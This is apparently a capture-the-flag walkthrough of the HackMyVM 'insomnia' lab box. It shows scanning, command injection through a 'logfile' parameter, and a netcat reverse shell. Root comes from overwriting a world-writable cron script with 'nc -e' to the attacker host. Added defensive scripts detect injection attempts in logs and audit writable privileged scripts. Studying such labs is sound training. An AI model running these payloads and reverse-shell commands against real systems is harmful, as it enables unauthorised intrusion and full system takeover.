
HMV-insomnia

HMV-insomnia box walkthrough

Port scanning

```console
┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.112.252
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-16 20:12 CST
Nmap scan report for bogon (192.168.112.252)
Host is up (0.0014s latency).
Not shown: 999 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
8080/tcp open  http    PHP cli server 5.5 or later (PHP 7.3.19-1)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Chat
MAC Address: D2:24:EE:B5:C6:9D (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   1.36 ms bogon (192.168.112.252)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.19 seconds
```

Only port 8080 is open, and it is an HTTP service, so let's take a look at the web side.

Web probing

The site presents a single input box.

Next, a directory scan:

```console
┌──(root㉿kakeru)-[~/tmp]
└─# dirsearch -u 192.168.112.252:8080 -e php,jpg,html,js,txt,bak -i 200,300-399
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jpg, html, js, txt, bak | HTTP method: GET | Threads: 25
Wordlist size: 11988

Output File: /root/tmp/reports/_192.168.112.252_8080/_25-02-16_20-21-37.txt

Target: http://192.168.112.252:8080/

[20:21:37] Starting:
[20:21:48] 200 -   65B - /administration.php
[20:21:53] 200 -    2KB - /chat.js
[20:21:53] 200 -    3B - /chat.txt
[20:22:13] 200 -   20B - /start.sh

Task Completed
```

```console
┌──(root㉿kakeru)-[~/tmp]
└─# curl http://192.168.112.252:8080//administration.php
You are not allowed to view : <br>Your activity has been logged
┌──(root㉿kakeru)-[~/tmp]
└─# curl http://192.168.112.252:8080/start.sh
php -S 0.0.0.0:8080

┌──(root㉿kakeru)-[~/tmp]
└─# curl http://192.168.112.252:8080/chat.txt



```

There is no further information to be had here. The next idea is to brute-force parameter names on administration.php: since it is a PHP file, it may contain a backdoor.

```console
┌──(root㉿kakeru)-[~/tmp]
└─# wfuzz -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 192.168.112.252:8080//administration.php?FUZZ=id --hh 65
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.112.252:8080//administration.php?FUZZ=id
Total requests: 4744

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000002522:   200        2 L      12 W       67 Ch       "logfile"
```

The parameter `logfile` turns up; let's try it on the site.

Nothing is echoed back, so I ping my own host from the injected command and watch with tcpdump to verify that commands really execute:

```console
?logfile=id;ping -c2 192.168.112.11

┌──(root㉿kakeru)-[~/tmp]
└─# tcpdump -A -n icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
20:34:03.429775 IP 192.168.112.252 > 192.168.112.11: ICMP echo request, id 6058, seq 15, length 64
E..T..@.@..9..p...p.........;..g............................ !"#$%&'()*+,-./01234567
20:34:03.429824 IP 192.168.112.11 > 192.168.112.252: ICMP echo reply, id 6058, seq 15, length 64
E..To^..@.....p...p.........;..g............................ !"#$%&'()*+,-./01234567
20:34:04.437600 IP 192.168.112.252 > 192.168.112.11: ICMP echo request, id 6058, seq 16, length 64
E..T..@.@..b..p...p.........<..g............................ !"#$%&'()*+,-./01234567
```
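From the defender's side, the `?logfile=id;ping ...` probe above is easy to spot in the web server's request log: a legitimate `logfile` value never contains shell control characters. The script below is an added example and is not part of the original write-up; it flags such requests and lists the client addresses behind them. The log lines are constructed and only approximate the PHP built-in server's log format, and the parameter name `logfile` and the addresses are taken from this walkthrough rather than from any real log.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): flag requests whose query
# string carries shell control characters, which is how the
# ?logfile=id;ping ... probe would show up to a defender reading the PHP
# built-in server's request log. The sample lines are constructed and only
# approximate that log's format.

# Constructed sample log (format approximated; addresses assumed).
sample_log() {
    cat <<'EOF'
[Sun Feb 16 20:30:11 2025] 192.168.112.11:51200 [200]: GET /
[Sun Feb 16 20:31:02 2025] 192.168.112.11:51210 [200]: GET /administration.php?logfile=chat.txt
[Sun Feb 16 20:34:03 2025] 192.168.112.11:51234 [200]: GET /administration.php?logfile=id;ping+-c2+192.168.112.11
[Sun Feb 16 20:35:40 2025] 192.168.112.11:51240 [200]: GET /administration.php?logfile=id%3bwhoami
[Sun Feb 16 20:36:05 2025] 192.168.112.20:40012 [200]: GET /administration.php?logfile=id|id
[Sun Feb 16 20:36:30 2025] 192.168.112.20:40020 [404]: GET /chat.txt?ts=1&x=2
EOF
}

# Print every line whose query string (the part after '?') contains a shell
# control sequence: ';', '|', '&&', a backtick, '$(' or their URL-encoded forms.
# A lone '&' is the normal parameter separator and is deliberately not flagged.
flag_injection_lines() {
    grep -E '\?[^ ]*(;|\||&&|`|\$\(|%3[bB]|%7[cC]|%26%26|%60|%24%28)' "$1"
}

# Number of flagged lines, as a bare integer.
count_flagged() {
    flag_injection_lines "$1" | wc -l | tr -d ' '
}

# Unique client addresses behind flagged requests (field 6 is addr:port).
flagged_clients() {
    flag_injection_lines "$1" | awk '{ split($6, a, ":"); print a[1] }' | sort -u
}

# Demo against the constructed sample.
demo_log=$(mktemp)
sample_log > "$demo_log"
echo "flagged requests: $(count_flagged "$demo_log")"
flagged_clients "$demo_log"
rm -f "$demo_log"
```

Against the sample, three requests are flagged and two client addresses are reported. The pattern deliberately matches the encoded forms too, because the encoded `%3b` in the fourth line is exactly as dangerous to a `shell_exec`-style sink as the raw `;` in the third.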

Reverse shell

```console
┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234
id
id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
script -qc /bin/bash /dev/null
www-data@insomnia:~/html$ ^Z
zsh: suspended  nc -lp 1234

┌──(root㉿kakeru)-[~/tmp]
└─# cat bbb
stty raw -echo; fg

┌──(root㉿kakeru)-[~/tmp]
└─# stty raw -echo; fg
[1]  + continued  nc -lp 1234
reset
reset: unknown terminal type unknown
Terminal type? xterm
```

Privilege escalation

```console
www-data@insomnia:~/html$ sudo -l
Matching Defaults entries for www-data on insomnia:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on insomnia:
    (julia) NOPASSWD: /bin/bash /var/www/html/start.sh

www-data@insomnia:~/html$ cat /var/www/html/start.sh
php -S 0.0.0.0:8080
```

Surprisingly, start.sh is writable by everyone. Since it is a shell script, we simply append /bin/bash to it:

```console
www-data@insomnia:~/html$ ls -al
total 40
drwxr-xr-x 3 www-data www-data 4096 Feb 16 07:14 .
drwxr-xr-x 3 root     root     4096 Dec 17  2020 ..
-rw-r--r-- 1 www-data www-data  426 Dec 21  2020 administration.php
-rw-r--r-- 1 www-data www-data 1610 Dec 20  2020 chat.js
-rw-r--r-- 1 www-data www-data 4096 Feb 16 07:39 chat.txt
drwxr-xr-x 2 www-data www-data 4096 Dec 20  2020 images
-rw-r--r-- 1 www-data www-data 2899 Dec 21  2020 index.php
-rw-r--r-- 1 www-data www-data 1684 Dec 20  2020 process.php
-rwxrwxrwx 1 root     root       20 Dec 21  2020 start.sh
-rw-r--r-- 1 www-data www-data 1363 Dec 20  2020 style.css

www-data@insomnia:~/html$ echo "/bin/bash" >> /var/www/html/start.sh

www-data@insomnia:~/html$ sudo -u julia /bin/bash /var/www/html/start.sh
[Sun Feb 16 07:57:36 2025] Failed to listen on 0.0.0.0:8080 (reason: Address already in use)
julia@insomnia:/var/www/html$ id
uid=1000(julia) gid=1000(julia) groups=1000(julia),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
```

That gives a shell as the user julia.

```console
julia@insomnia:/var/www/html$ find / -user root -perm -4000 -print 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/passwd
/usr/bin/su
/usr/bin/umount
/usr/bin/newgrp
```

Nothing useful among the SUID binaries, so upload pspy64 from my machine and check for scheduled tasks:

```console
julia@insomnia:~$ wget 192.168.112.11/pspy64
--2025-02-16 08:00:40--  http://192.168.112.11/pspy64
Connecting to 192.168.112.11:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64              100%[===============>]   2.96M  --.-KB/s    in 0.09s

2025-02-16 08:00:40 (34.1 MB/s) - ‘pspy64’ saved [3104768/3104768]

julia@insomnia:~$ chmod =x ^C
julia@insomnia:~$ chmoc ^C
julia@insomnia:~$ chmod +x pspy64
julia@insomnia:~$ ./pspy64

2025/02/16 08:00:58 CMD: UID=0    PID=2      |
2025/02/16 08:00:58 CMD: UID=0    PID=1      | /sbin/init
2025/02/16 08:01:01 CMD: UID=0    PID=766    | /usr/sbin/CRON -f
2025/02/16 08:01:01 CMD: UID=0    PID=767    | /usr/sbin/CRON -f
2025/02/16 08:01:01 CMD: UID=0    PID=768    | /bin/sh -c /bin/bash /var/cron/check.sh
2025/02/16 08:01:01 CMD: UID=0    PID=769    | /bin/bash /var/cron/check.sh
```

Root really does run a scheduled task, /var/cron/check.sh:

```console
julia@insomnia:~$ cat /var/cron/check.sh
#!/bin/bash
status=$(systemctl is-active insomnia.service)
if [ "$status" == "active" ]; then
    echo "OK"
else
    systemctl start insomnia.service
fi
```

This file is world-writable too:

```console
julia@insomnia:/var/cron$ ls -al
total 12
drwxr-xr-x  2 root root 4096 Dec 21  2020 .
drwxr-xr-x 13 root root 4096 Dec 21  2020 ..
-rwxrwxrwx  1 root root  153 Dec 21  2020 check.sh
```

Same idea as with the user step: write a reverse shell into the script and let root's cron job execute it to get a root shell.

```console
julia@insomnia:/var/cron$ echo "nc -e 192.168.112.11 1234 /bin/bash" > check.sh

┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234
id
uid=0(root) gid=0(root) groups=0(root)
```
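Both escalations on this box (the sudo rule on start.sh and the root cron job on check.sh) come down to the same misconfiguration: a script that runs with elevated rights but is writable by a less-privileged user. The audit script below is an added example, not part of the original write-up or of the box. It pulls script paths out of sudoers/crontab text, reports the ones whose mode grants write to group or others, and removes that write bit. The sudoers line mirrors the `sudo -l` output shown above; the cron schedule is an assumption, since pspy only shows the command that ran.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): audit scripts that run with
# elevated rights, such as the sudo target start.sh and the root cron job
# check.sh, for the weakness used above: a low-privileged user can write them.

# Constructed text standing in for sudoers / root crontab content.
# The sudoers rule matches the box's `sudo -l` output; the schedule is assumed.
sample_privileged_config() {
    cat <<'EOF'
# sudoers rule (as reported by sudo -l on the box)
www-data ALL=(julia) NOPASSWD: /bin/bash /var/www/html/start.sh
# root crontab entry (schedule assumed)
* * * * * /bin/bash /var/cron/check.sh
EOF
}

# Extract absolute script paths (ending in .sh) from sudoers/crontab text.
script_paths_in() {
    printf '%s\n' "$1" | grep -oE '/[^[:space:],]+\.sh'
}

# True when an octal mode string (e.g. 777, 4755) grants write to group or others.
others_can_write() {
    [ $((0$1 & 022)) -ne 0 ]
}

# Octal permission bits of a file (GNU stat first, BSD stat as fallback).
file_mode() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"
}

# Print "path mode" for every existing script that group or others may write.
find_loose_scripts() {
    for f in "$@"; do
        [ -f "$f" ] || continue
        mode=$(file_mode "$f")
        others_can_write "$mode" && echo "$f $mode"
    done
    return 0
}

# Remediation: drop group/other write. Run as root, also pin ownership with
# `chown root:root` so a less-trusted owner cannot simply re-add the bit.
harden_script() {
    chmod go-w "$1"
}

# Demo on a constructed copy of start.sh with the lab box's 777 permissions.
demo_dir=$(mktemp -d)
printf '#!/bin/bash\nphp -S 0.0.0.0:8080\n' > "$demo_dir/start.sh"
chmod 777 "$demo_dir/start.sh"
echo "paths named in privileged config:"
script_paths_in "$(sample_privileged_config)"
echo "loose before hardening: $(find_loose_scripts "$demo_dir/start.sh")"
harden_script "$demo_dir/start.sh"
echo "loose after hardening:  $(find_loose_scripts "$demo_dir/start.sh")"
rm -rf "$demo_dir"
```

On a live host you would feed `find_loose_scripts` the paths from `/etc/sudoers`, `/etc/sudoers.d/*`, `/etc/crontab` and root's crontab; on this box it would report `/var/www/html/start.sh 777` and `/var/cron/check.sh 777`, both of which `chmod go-w` closes. The mode check uses the `022` mask so that a setuid `4755` file is not reported: only write permission for group or others matters here.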

Summary

I picked up a few more directory-scanning tricks, such as adding extensions and accepting only specific status codes, then PHP parameter injection, and got more practice with wfuzz.
The privilege escalation part was still quite easy: both steps came down to writable files, and root-owned ones at that.